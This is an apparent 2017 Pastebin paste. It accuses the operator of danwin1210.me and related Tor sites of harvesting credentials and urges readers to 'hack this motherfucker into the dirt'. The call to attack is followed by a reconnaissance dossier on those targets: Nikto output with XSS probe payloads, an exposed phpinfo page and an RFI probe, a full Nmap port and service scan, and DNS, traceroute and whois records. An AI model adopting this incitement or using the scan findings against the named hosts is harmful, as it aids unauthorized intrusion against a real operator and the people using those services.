Advertisement
Guest User

Linux CSS Python Facebook Amazon HTML

a guest
Apr 7th, 2017
1,259
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 30.07 KB | None | 0 0
  1. the owner of this site runs galaxy2 intel exchange chattor and many other sites on the tor network
  2. collecting user credentials and logging all chat even on daniel's chat
  3. so feel free to hack this motherfucker into the dirt here's some basic info:
  4. https://pastebin.com/NMicmy5Y
  5.  
  6. http://tt3j2x4k5ycaa5zt.onion
  7.  
  8. nikto -host http://tt3j2x4k5ycaa5zt.onion
  9. - Nikto v2.1.5
  10. ---------------------------------------------------------------------------
  11. + Target IP: 10.192.22.133
  12. + Target Hostname: tt3j2x4k5ycaa5zt.onion
  13. + Target Port: 80
  14. + Start Time: 2017-04-05 02:43:09 (GMT-4)
  15. ---------------------------------------------------------------------------
  16. + Server: nginx
  17. + The anti-clickjacking X-Frame-Options header is not present.
  18. + No CGI Directories found (use '-C all' to force check all possible dirs)
  19. + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x55c71dff 0x22
  20. + OSVDB-3268: /uploads/: Directory indexing found.
  21. + File/dir '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  22. + "robots.txt" contains 1 entry which should be manually viewed.
  23. + OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  24. + OSVDB-3931: /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  25. + OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  26. + /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  27. + /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  28. + OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  29. + OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  30. + OSVDB-3092: /mail/: This might be interesting...
  31. + Cookie pmaCookieVer created without the httponly flag
  32. + Cookie pma_lang created without the httponly flag
  33. + Cookie pma_collation_connection created without the httponly flag
  34. + Cookie phpMyAdmin created without the httponly flag
  35. + Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;
  36. + Uncommon header 'content-security-policy' found, with contents: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;;style-src 'self' 'unsafe-inline' ;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;
  37. + Uncommon header 'x-ob_mode' found, with contents: 1
  38. + Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;
  39. + Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
  40. + Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
  41. + Uncommon header 'x-xss-protection' found, with contents: 1; mode=block
  42. + Uncommon header 'x-content-type-options' found, with contents: nosniff
  43. + Uncommon header 'x-frame-options' found, with contents: DENY
  44. + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
  45. + Cookie language created without the httponly flag
  46. + Uncommon header 'referrer-policy' found, with contents: no-referrer
  47. + OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
  48.  
  49. ##########################
  50.  
  51. http://danwin1210.me [301] Country[UNITED STATES][US], HTTPServer[nginx], IP[207.154.197.249], RedirectLocation[https://danwin1210.me/], Title[301 Moved Permanently], nginx
  52. URL : http://danwin1210.me
  53. Status : 301
  54. Country --------------------------------------------------------------------
  55. Description: Shows the country the IPv4 address belongs to. This uses
  56. the GeoIP IP2Country database from
  57. http://software77.net/geo-ip/. Instructions on updating the
  58. database are in the plugin comments.
  59. String : UNITED STATES
  60. Module : US
  61.  
  62. HTTPServer -----------------------------------------------------------------
  63. Description: HTTP server header string. This plugin also attempts to
  64. identify the operating system from the server header.
  65. String : nginx (from server string)
  66.  
  67. IP -------------------------------------------------------------------------
  68. Description: IP address of the target, if available.
  69. String : 207.154.197.249
  70.  
  71. RedirectLocation -----------------------------------------------------------
  72. Description: HTTP Server string location. used with http-status 301 and
  73. 302
  74. String : https://danwin1210.me/ (from location)
  75.  
  76. Title ----------------------------------------------------------------------
  77. Description: The HTML page title
  78. String : 301 Moved Permanently (from page title)
  79.  
  80. nginx ----------------------------------------------------------------------
  81. Description: Nginx (Engine-X) is a free, open-source, high-performance
  82. HTTP server and reverse proxy, as well as an IMAP/POP3
  83. proxy server. - Homepage: http://nginx.net/
  84.  
  85. https://danwin1210.me/ [200]
  86. https://danwin1210.me/ [200] Country[UNITED STATES][US], HTTPServer[nginx], IP[207.154.197.249], nginx
  87. URL : https://danwin1210.me/
  88. Status : 200
  89. Country --------------------------------------------------------------------
  90. Description: Shows the country the IPv4 address belongs to. This uses
  91. the GeoIP IP2Country database from
  92. http://software77.net/geo-ip/. Instructions on updating the
  93. database are in the plugin comments.
  94. String : UNITED STATES
  95. Module : US
  96.  
  97. HTTPServer -----------------------------------------------------------------
  98. Description: HTTP server header string. This plugin also attempts to
  99. identify the operating system from the server header.
  100. String : nginx (from server string)
  101.  
  102. IP -------------------------------------------------------------------------
  103. Description: IP address of the target, if available.
  104. String : 207.154.197.249
  105.  
  106. nginx ----------------------------------------------------------------------
  107. Description: Nginx (Engine-X) is a free, open-source, high-performance
  108. HTTP server and reverse proxy, as well as an IMAP/POP3
  109. proxy server. - Homepage: http://nginx.net/
  110.  
  111.  
  112. ##########################################
  113.  
  114. Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-05 19:51 EDT
  115. NSE: Loaded 132 scripts for scanning.
  116. NSE: Script Pre-scanning.
  117. Initiating NSE at 19:51
  118. Completed NSE at 19:51, 0.00s elapsed
  119. Initiating NSE at 19:51
  120. Completed NSE at 19:51, 0.00s elapsed
  121. Initiating Ping Scan at 19:51
  122. Scanning 207.154.197.249 [4 ports]
  123. Completed Ping Scan at 19:51, 0.41s elapsed (1 total hosts)
  124. Initiating Parallel DNS resolution of 1 host. at 19:51
  125. Completed Parallel DNS resolution of 1 host. at 19:51, 0.20s elapsed
  126. Initiating SYN Stealth Scan at 19:51
  127. Scanning danwin1210.me (207.154.197.249) [1000 ports]
  128. Discovered open port 21/tcp on 207.154.197.249
  129. Discovered open port 993/tcp on 207.154.197.249
  130. Discovered open port 143/tcp on 207.154.197.249
  131. Discovered open port 587/tcp on 207.154.197.249
  132. Discovered open port 110/tcp on 207.154.197.249
  133. Discovered open port 443/tcp on 207.154.197.249
  134. Discovered open port 80/tcp on 207.154.197.249
  135. Discovered open port 22/tcp on 207.154.197.249
  136. Discovered open port 995/tcp on 207.154.197.249
  137. Discovered open port 5009/tcp on 207.154.197.249
  138. Discovered open port 5000/tcp on 207.154.197.249
  139. Discovered open port 5004/tcp on 207.154.197.249
  140. Discovered open port 5003/tcp on 207.154.197.249
  141. Discovered open port 5222/tcp on 207.154.197.249
  142. Discovered open port 465/tcp on 207.154.197.249
  143. Discovered open port 20/tcp on 207.154.197.249
  144. Discovered open port 5002/tcp on 207.154.197.249
  145. Discovered open port 5280/tcp on 207.154.197.249
  146. Discovered open port 5269/tcp on 207.154.197.249
  147. Discovered open port 5001/tcp on 207.154.197.249
  148. Completed SYN Stealth Scan at 19:51, 2.57s elapsed (1000 total ports)
  149. Initiating Service scan at 19:51
  150. Scanning 20 services on danwin1210.me (207.154.197.249)
  151. Completed Service scan at 19:53, 111.91s elapsed (20 services on 1 host)
  152. Initiating OS detection (try #1) against danwin1210.me (207.154.197.249)
  153. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  154. Offending packet: TCP 10.50.5.74:50216 > 207.154.197.249:21 ttl=59 id=12529 iplen=60 seq=2019977701 win=128 <wscale 10,nop,mss 265,timestamp 4294967295 0,sackOK>
  155. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  156. Offending packet: TCP 10.50.5.74:50217 > 207.154.197.249:21 SFPU ttl=59 id=64414 iplen=60 seq=2019977701 win=256 <wscale 10,nop,mss 265,timestamp 4294967295 0,sackOK>
  157. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  158. Offending packet: TCP 10.50.5.74:50221 > 207.154.197.249:1 FPU ttl=57 id=8147 iplen=60 seq=2019977701 win=65535 <wscale 15,nop,mss 265,timestamp 4294967295 0,sackOK>
  159. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  160. Offending packet: TCP 10.50.5.74:50216 > 207.154.197.249:21 ttl=42 id=56090 iplen=60 seq=2019977701 win=128 <wscale 10,nop,mss 265,timestamp 4294967295 0,sackOK>
  161. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  162. Offending packet: TCP 10.50.5.74:50217 > 207.154.197.249:21 SFPU ttl=42 id=24149 iplen=60 seq=2019977701 win=256 <wscale 10,nop,mss 265,timestamp 4294967295 0,sackOK>
  163. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  164. Offending packet: TCP 10.50.5.74:50221 > 207.154.197.249:1 FPU ttl=57 id=43843 iplen=60 seq=2019977701 win=65535 <wscale 15,nop,mss 265,timestamp 4294967295 0,sackOK>
  165. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  166. Offending packet: TCP 10.50.5.74:50216 > 207.154.197.249:21 ttl=39 id=40618 iplen=60 seq=2019977701 win=128 <wscale 10,nop,mss 265,timestamp 4294967295 0,sackOK>
  167. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  168. Offending packet: TCP 10.50.5.74:50217 > 207.154.197.249:21 SFPU ttl=58 id=48514 iplen=60 seq=2019977701 win=256 <wscale 10,nop,mss 265,timestamp 4294967295 0,sackOK>
  169. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  170. Offending packet: TCP 10.50.5.74:50221 > 207.154.197.249:1 FPU ttl=58 id=47253 iplen=60 seq=2019977701 win=65535 <wscale 15,nop,mss 265,timestamp 4294967295 0,sackOK>
  171. sendto in send_ip_packet_sd: sendto(7, packet, 60, 0, 207.154.197.249, 16) => Operation not permitted
  172. Offending packet: TCP 10.50.5.74:50216 > 207.154.197.249:21 ttl=50 id=27396 iplen=60 seq=2019977701 win=128 <wscale 10,nop,mss 265,timestamp 4294967295 0,sackOK>
  173. Omitting future Sendto error messages now that 10 have been shown. Use -d2 if you really want to see them.
  174. Retrying OS detection (try #2) against danwin1210.me (207.154.197.249)
  175. adjust_timeouts2: packet supposedly had rtt of -90398 microseconds. Ignoring time.
  176. adjust_timeouts2: packet supposedly had rtt of -90398 microseconds. Ignoring time.
  177. adjust_timeouts2: packet supposedly had rtt of -76864 microseconds. Ignoring time.
  178. adjust_timeouts2: packet supposedly had rtt of -76864 microseconds. Ignoring time.
  179. Retrying OS detection (try #3) against danwin1210.me (207.154.197.249)
  180. adjust_timeouts2: packet supposedly had rtt of -123823 microseconds. Ignoring time.
  181. adjust_timeouts2: packet supposedly had rtt of -123823 microseconds. Ignoring time.
  182. Retrying OS detection (try #4) against danwin1210.me (207.154.197.249)
  183. adjust_timeouts2: packet supposedly had rtt of -132568 microseconds. Ignoring time.
  184. adjust_timeouts2: packet supposedly had rtt of -132568 microseconds. Ignoring time.
  185. adjust_timeouts2: packet supposedly had rtt of -132378 microseconds. Ignoring time.
  186. adjust_timeouts2: packet supposedly had rtt of -132378 microseconds. Ignoring time.
  187. Initiating Traceroute at 19:53
  188. Completed Traceroute at 19:53, 3.28s elapsed
  189. Initiating Parallel DNS resolution of 13 hosts. at 19:53
  190. Completed Parallel DNS resolution of 13 hosts. at 19:53, 2.71s elapsed
  191. NSE: Script scanning 207.154.197.249.
  192. Initiating NSE at 19:53
  193. Completed NSE at 19:54, 26.31s elapsed
  194. Initiating NSE at 19:54
  195. Completed NSE at 19:54, 0.01s elapsed
  196. Nmap scan report for danwin1210.me (207.154.197.249)
  197. Host is up (0.23s latency).
  198. Not shown: 979 closed ports
  199. PORT STATE SERVICE VERSION
  200. 20/tcp open tcpwrapped
  201. 21/tcp open ftp vsftpd 3.0.3
  202. 22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
  203. | ssh-hostkey:
  204. | 2048 f1:48:90:77:d3:82:b2:4b:2c:d6:b9:03:a0:bc:4b:e6 (RSA)
  205. |_ 256 9d:a3:ce:5e:d4:4a:21:f1:f0:0e:eb:54:67:a5:2a:4b (ECDSA)
  206. 25/tcp filtered smtp
  207. 80/tcp open http nginx
  208. | http-methods:
  209. |_ Supported Methods: GET HEAD POST OPTIONS
  210. |_http-server-header: nginx
  211. |_http-title: Did not follow redirect to https://danwin1210.me/
  212. 110/tcp open pop3 Dovecot pop3d
  213. |_pop3-capabilities: TOP PIPELINING CAPA UIDL SASL(PLAIN LOGIN) USER STLS AUTH-RESP-CODE RESP-CODES
  214. | ssl-cert: Subject: commonName=danwin1210.me
  215. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  216. | Public Key type: rsa
  217. | Public Key bits: 2048
  218. | Signature Algorithm: sha256WithRSAEncryption
  219. | Not valid before: 2017-02-26T11:20:00
  220. | Not valid after: 2017-05-27T11:20:00
  221. | MD5: 2179 ec6d 2168 5c0e 96e3 942e 4e7b cb49
  222. |_SHA-1: 56b9 1676 1863 c22c 7a55 78bc 1b82 c1d8 2d8d 0802
  223. |_ssl-date: TLS randomness does not represent time
  224. 143/tcp open imap Dovecot imapd
  225. |_imap-capabilities: capabilities Pre-login have IDLE more LOGIN-REFERRALS SASL-IR ENABLE AUTH=PLAIN ID listed AUTH=LOGINA0001 LITERAL+ OK STARTTLS IMAP4rev1 post-login
  226. | ssl-cert: Subject: commonName=danwin1210.me
  227. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  228. | Public Key type: rsa
  229. | Public Key bits: 2048
  230. | Signature Algorithm: sha256WithRSAEncryption
  231. | Not valid before: 2017-02-26T11:20:00
  232. | Not valid after: 2017-05-27T11:20:00
  233. | MD5: 2179 ec6d 2168 5c0e 96e3 942e 4e7b cb49
  234. |_SHA-1: 56b9 1676 1863 c22c 7a55 78bc 1b82 c1d8 2d8d 0802
  235. |_ssl-date: TLS randomness does not represent time
  236. 443/tcp open ssl/http nginx
  237. |_http-favicon: Unknown favicon MD5: 871C151F112F820ED24B7C1080CB87AF
  238. | http-methods:
  239. |_ Supported Methods: GET HEAD POST
  240. |_http-server-header: nginx
  241. |_http-title: Daniel - Home
  242. | ssl-cert: Subject: commonName=danwin1210.me
  243. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  244. | Public Key type: rsa
  245. | Public Key bits: 2048
  246. | Signature Algorithm: sha256WithRSAEncryption
  247. | Not valid before: 2017-02-26T11:20:00
  248. | Not valid after: 2017-05-27T11:20:00
  249. | MD5: 2179 ec6d 2168 5c0e 96e3 942e 4e7b cb49
  250. |_SHA-1: 56b9 1676 1863 c22c 7a55 78bc 1b82 c1d8 2d8d 0802
  251. |_ssl-date: TLS randomness does not represent time
  252. | tls-nextprotoneg:
  253. |_ http/1.1
  254. 465/tcp open ssl/smtp Postfix smtpd
  255. |_smtp-commands: tt3j2x4k5ycaa5zt.onion, PIPELINING, SIZE 10240000, VRFY, ETRN, AUTH PLAIN LOGIN, AUTH=PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
  256. | ssl-cert: Subject: commonName=danwin1210.me
  257. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  258. | Public Key type: rsa
  259. | Public Key bits: 2048
  260. | Signature Algorithm: sha256WithRSAEncryption
  261. | Not valid before: 2017-02-26T11:20:00
  262. | Not valid after: 2017-05-27T11:20:00
  263. | MD5: 2179 ec6d 2168 5c0e 96e3 942e 4e7b cb49
  264. |_SHA-1: 56b9 1676 1863 c22c 7a55 78bc 1b82 c1d8 2d8d 0802
  265. |_ssl-date: TLS randomness does not represent time
  266. 587/tcp open smtp Postfix smtpd
  267. |_smtp-commands: tt3j2x4k5ycaa5zt.onion, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, AUTH=PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
  268. | ssl-cert: Subject: commonName=danwin1210.me
  269. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  270. | Public Key type: rsa
  271. | Public Key bits: 2048
  272. | Signature Algorithm: sha256WithRSAEncryption
  273. | Not valid before: 2017-02-26T11:20:00
  274. | Not valid after: 2017-05-27T11:20:00
  275. | MD5: 2179 ec6d 2168 5c0e 96e3 942e 4e7b cb49
  276. |_SHA-1: 56b9 1676 1863 c22c 7a55 78bc 1b82 c1d8 2d8d 0802
  277. |_ssl-date: TLS randomness does not represent time
  278. 993/tcp open ssl/imap Dovecot imapd
  279. | ssl-cert: Subject: commonName=danwin1210.me
  280. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  281. | Public Key type: rsa
  282. | Public Key bits: 2048
  283. | Signature Algorithm: sha256WithRSAEncryption
  284. | Not valid before: 2017-02-26T11:20:00
  285. | Not valid after: 2017-05-27T11:20:00
  286. | MD5: 2179 ec6d 2168 5c0e 96e3 942e 4e7b cb49
  287. |_SHA-1: 56b9 1676 1863 c22c 7a55 78bc 1b82 c1d8 2d8d 0802
  288. |_ssl-date: TLS randomness does not represent time
  289. 995/tcp open ssl/pop3 Dovecot pop3d
  290. | ssl-cert: Subject: commonName=danwin1210.me
  291. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  292. | Public Key type: rsa
  293. | Public Key bits: 2048
  294. | Signature Algorithm: sha256WithRSAEncryption
  295. | Not valid before: 2017-02-26T11:20:00
  296. | Not valid after: 2017-05-27T11:20:00
  297. | MD5: 2179 ec6d 2168 5c0e 96e3 942e 4e7b cb49
  298. |_SHA-1: 56b9 1676 1863 c22c 7a55 78bc 1b82 c1d8 2d8d 0802
  299. |_ssl-date: TLS randomness does not represent time
  300. 5000/tcp open xmpp-transport Spectrum XMPP file transfer
  301. 5001/tcp open tcpwrapped
  302. 5002/tcp open tcpwrapped
  303. 5003/tcp open tcpwrapped
  304. 5004/tcp open tcpwrapped
  305. 5009/tcp open tcpwrapped
  306. 5222/tcp open jabber Prosody Jabber client
  307. | ssl-cert: Subject: commonName=danwin1210.me
  308. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  309. | Public Key type: rsa
  310. | Public Key bits: 2048
  311. | Signature Algorithm: sha256WithRSAEncryption
  312. | Not valid before: 2017-02-26T11:20:00
  313. | Not valid after: 2017-05-27T11:20:00
  314. | MD5: 2179 ec6d 2168 5c0e 96e3 942e 4e7b cb49
  315. |_SHA-1: 56b9 1676 1863 c22c 7a55 78bc 1b82 c1d8 2d8d 0802
  316. |_ssl-date: TLS randomness does not represent time
  317. | xmpp-info:
  318. | Respects server name
  319. | info:
  320. | xmpp:
  321. | lang: en
  322. | version: 1.0
  323. | capabilities:
  324. |
  325. | pre_tls:
  326. | xmpp:
  327. |
  328. | capabilities:
  329. |
  330. | features:
  331. | TLS
  332. | post_tls:
  333. | xmpp:
  334. |
  335. | capabilities:
  336. |
  337. | auth_mechanisms:
  338. | PLAIN
  339. |_ Non-SASL
  340. 5269/tcp open jabber Prosody Jabber server
  341. | ssl-cert: Subject: commonName=danwin1210.me
  342. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  343. | Public Key type: rsa
  344. | Public Key bits: 2048
  345. | Signature Algorithm: sha256WithRSAEncryption
  346. | Not valid before: 2017-02-26T11:20:00
  347. | Not valid after: 2017-05-27T11:20:00
  348. | MD5: 2179 ec6d 2168 5c0e 96e3 942e 4e7b cb49
  349. |_SHA-1: 56b9 1676 1863 c22c 7a55 78bc 1b82 c1d8 2d8d 0802
  350. |_ssl-date: TLS randomness does not represent time
  351. | xmpp-info:
  352. | Respects server name
  353. | info:
  354. | xmpp:
  355. | lang: en
  356. | version: 1.0
  357. | capabilities:
  358. |
  359. | features:
  360. | Server Dialback
  361. | pre_tls:
  362. | xmpp:
  363. |
  364. | capabilities:
  365. |
  366. | features:
  367. | TLS
  368. | post_tls:
  369. | xmpp:
  370. |
  371. |_ capabilities:
  372. 5280/tcp open xmpp-bosh?
  373. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  374. SF-Port5280-TCP:V=7.01%I=7%D=4/5%Time=58E58304%P=i686-pc-linux-gnu%r(GetRe
  375. SF:quest,1DF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Wed,\x2005\x2
  376. SF:0Apr\x202017\x2023:51:32\x20GMT\r\nContent-Length:\x20393\r\n\r\n<!DOCT
  377. SF:YPE\x20html>\n<html>\n<head><meta\x20charset=\"utf-8\"><style>body{marg
  378. SF:in-top:14%;text-align:center;background-color:#F8F8F8;font-family:sans-
  379. SF:serif;}h1{font-size:xx-large;}p{font-size:x-large;}p\+p\x20{\x20font-si
  380. SF:ze:\x20large;\x20font-family:\x20courier\x20}</style>\n</head>\n<body><
  381. SF:h1>400\x20Bad\x20Request</h1><p>What\x20kind\x20of\x20request\x20do\x20
  382. SF:you\x20call\x20that\?\?</p><p>Missing\x20or\x20invalid\x20&apos;Host&ap
  383. SF:os;\x20header</p>\n</body>\n</html>")%r(HTTPOptions,1DF,"HTTP/1\.0\x204
  384. SF:00\x20Bad\x20Request\r\nDate:\x20Wed,\x2005\x20Apr\x202017\x2023:51:33\
  385. SF:x20GMT\r\nContent-Length:\x20393\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<he
  386. SF:ad><meta\x20charset=\"utf-8\"><style>body{margin-top:14%;text-align:cen
  387. SF:ter;background-color:#F8F8F8;font-family:sans-serif;}h1{font-size:xx-la
  388. SF:rge;}p{font-size:x-large;}p\+p\x20{\x20font-size:\x20large;\x20font-fam
  389. SF:ily:\x20courier\x20}</style>\n</head>\n<body><h1>400\x20Bad\x20Request<
  390. SF:/h1><p>What\x20kind\x20of\x20request\x20do\x20you\x20call\x20that\?\?</
  391. SF:p><p>Missing\x20or\x20invalid\x20&apos;Host&apos;\x20header</p>\n</body
  392. SF:>\n</html>")%r(FourOhFourRequest,1DF,"HTTP/1\.0\x20400\x20Bad\x20Reques
  393. SF:t\r\nDate:\x20Wed,\x2005\x20Apr\x202017\x2023:52:24\x20GMT\r\nContent-L
  394. SF:ength:\x20393\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head><meta\x20charset
  395. SF:=\"utf-8\"><style>body{margin-top:14%;text-align:center;background-colo
  396. SF:r:#F8F8F8;font-family:sans-serif;}h1{font-size:xx-large;}p{font-size:x-
  397. SF:large;}p\+p\x20{\x20font-size:\x20large;\x20font-family:\x20courier\x20
  398. SF:}</style>\n</head>\n<body><h1>400\x20Bad\x20Request</h1><p>What\x20kind
  399. SF:\x20of\x20request\x20do\x20you\x20call\x20that\?\?</p><p>Missing\x20or\
  400. SF:x20invalid\x20&apos;Host&apos;\x20header</p>\n</body>\n</html>");
  401. Aggressive OS guesses: OpenWrt Kamikaze 7.09 (Linux 2.6.22) (91%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (90%), OpenWrt White Russian 0.9 (Linux 2.4.30) (90%), Linux 3.12 (90%), Linux 3.18 (89%), HP P2000 G3 NAS device (88%), DD-WRT v24-sp2 (Linux 3.10) (88%), Linux 2.4.18 (88%), Linux 2.6.32 (88%), ProVision-ISR security DVR (88%)
  402. No exact OS matches for host (test conditions non-ideal).
  403. Network Distance: 18 hops
  404. TCP Sequence Prediction: Difficulty=250 (Good luck!)
  405. IP ID Sequence Generation: All zeros
  406. Service Info: Host: danwin1210.me; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  407.  
  408. TRACEROUTE (using port 135/tcp)
  409. HOP RTT ADDRESS
  410. 1 82.70 ms 10.50.0.1
  411. 2 83.55 ms server2.lax.airvpn.org (199.241.146.177)
  412. 3 125.11 ms cs2.lax3.hugeserver.com (199.244.116.41)
  413. 4 86.29 ms cr1.lax3.hugeserver.com (199.244.116.5)
  414. 5 124.75 ms ae0-170.cr1-lax2.ip4.gtt.net (173.205.61.21)
  415. 6 124.58 ms ix-ae-12-0.tcore1.LVW-Los-Angeles.as6453.net (66.110.59.101)
  416. 7 ...
  417. 8 245.20 ms if-ae-36-2.tcore2.AEQ-Ashburn.as6453.net (216.6.87.110)
  418. 9 246.47 ms if-ae-11-2.thar2.NJY-Newark.as6453.net (216.6.87.169)
  419. 10 ...
  420. 11 243.40 ms if-ae-4-2.tcore1.L78-London.as6453.net (80.231.130.33)
  421. 12 239.81 ms if-ae-3-2.tcore1.PYE-Paris.as6453.net (80.231.154.142)
  422. 13 270.20 ms if-ae-4-2.tcore1.FR0-Frankfurt.as6453.net (195.219.87.18)
  423. 14 ... 15
  424. 16 269.24 ms 195.219.50.218
  425. 17 ...
  426. 18 240.06 ms danwin1210.me (207.154.197.249)
  427.  
  428. NSE: Script Post-scanning.
  429. Initiating NSE at 19:54
  430. Completed NSE at 19:54, 0.00s elapsed
  431. Initiating NSE at 19:54
  432. Completed NSE at 19:54, 0.00s elapsed
  433. Read data files from: /usr/bin/../share/nmap
  434. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  435. Nmap done: 1 IP address (1 host up) scanned in 168.79 seconds
  436. Raw packets sent: 1188 (55.760KB) | Rcvd: 1171 (50.700KB)
  437.  
  438.  
  439. ##############################
  440.  
  441. 207.154.197.249 is from United States (US) in region North America
  442. Input: 207.154.197.249
  443. canonical name: danwin1210.me
  444. Registered Domain: danwin1210.me
  445.  
  446. TraceRoute from Network-Tools.com to 207.154.197.249 [danwin1210.me]
  447. Hop (ms) (ms) (ms) IP Address Host name
  448. 1 Timed out Timed out Timed out -
  449. 2 1 1 1 4.68.63.178 ntt-level3-200g.dallas1.level3.net
  450. 3 4 6 6 129.250.4.83 ae-14.r22.dllstx09.us.bb.gin.ntt.net
  451. 4 36 36 36 129.250.5.13 ae-1.r22.asbnva02.us.bb.gin.ntt.net
  452. 5 126 126 127 129.250.4.97 ae-8.r20.frnkge04.de.bb.gin.ntt.net
  453. 6 127 127 127 129.250.5.218 ae-2.r02.frnkge03.de.bb.gin.ntt.net
  454. 7 126 126 127 213.198.72.202 -
  455. 8 Timed out Timed out Timed out -
  456. 9 136 136 137 207.154.197.249 danwin1210.me
  457.  
  458. Trace complete
  459.  
  460. Retrieving DNS records for danwin1210.me...
  461. DNS servers
  462. dns110.ovh.net
  463. ns110.ovh.net
  464.  
  465. Answer records
  466. danwin1210.me SOA
  467. server: dns110.ovh.net
  468. email: tech@ovh.net
  469. serial: 2017033040
  470. refresh: 86400
  471. retry: 3600
  472. expire: 3600000
  473. minimum ttl: 300
  474. 3600s
  475. danwin1210.me NS dns110.ovh.net 3600s
  476. danwin1210.me NS ns110.ovh.net 3600s
  477. danwin1210.me MX
  478. preference: 1
  479. exchange: danwin1210.me
  480. 3600s
  481. danwin1210.me A 207.154.197.249 3600s
  482. danwin1210.me 28 [16 bytes] 3600s
  483. danwin1210.me TXT v=spf1 a mx -all 600s
  484.  
  485. Authority records
  486.  
  487. Additional records
  488. Whois query for danwin1210.me...
  489. Results returned from whois.nic.me:
  490.  
  491. Domain Name: DANWIN1210.ME
  492. Registry Domain ID: D425500000001344790-AGRS
  493. Registrar WHOIS Server: whois.namecheap.com
  494. Registrar URL: www.namecheap.com
  495. Updated Date: 2017-03-30T18:03:00Z
  496. Creation Date: 2016-12-07T06:20:05Z
  497. Registry Expiry Date: 2017-12-07T06:20:05Z
  498. Registrar: NameCheap, Inc.
  499. Registrar IANA ID: 1068
  500. Registrar Abuse Contact Email: abuse@namecheap.com
  501. Registrar Abuse Contact Phone: +1.6613102107
  502. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  503. Registry Registrant ID: 4ic8pg2a0irjaazh
  504. Registrant Name: WhoisGuard Protected
  505. Registrant Organization: WhoisGuard, Inc.
  506. Registrant Street: P.O. Box 0823-03411
  507. Registrant City: Panama
